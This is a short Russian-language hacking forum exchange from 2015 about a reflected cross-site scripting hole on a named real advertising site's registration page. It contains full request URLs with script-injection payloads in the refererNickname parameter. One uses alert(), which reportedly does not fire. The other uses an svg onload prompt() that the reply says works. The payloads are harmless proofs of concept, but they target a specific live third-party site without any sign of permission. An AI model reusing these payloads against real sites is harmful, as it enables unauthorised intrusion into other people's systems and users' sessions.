13.07.2015, 00:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от ocheretko
↑
Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:
Код:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox
Код:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1
User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:
Код:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
я пока сам не понял в чем дело, однако prompt() срабатывает:
Код:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
|
|
|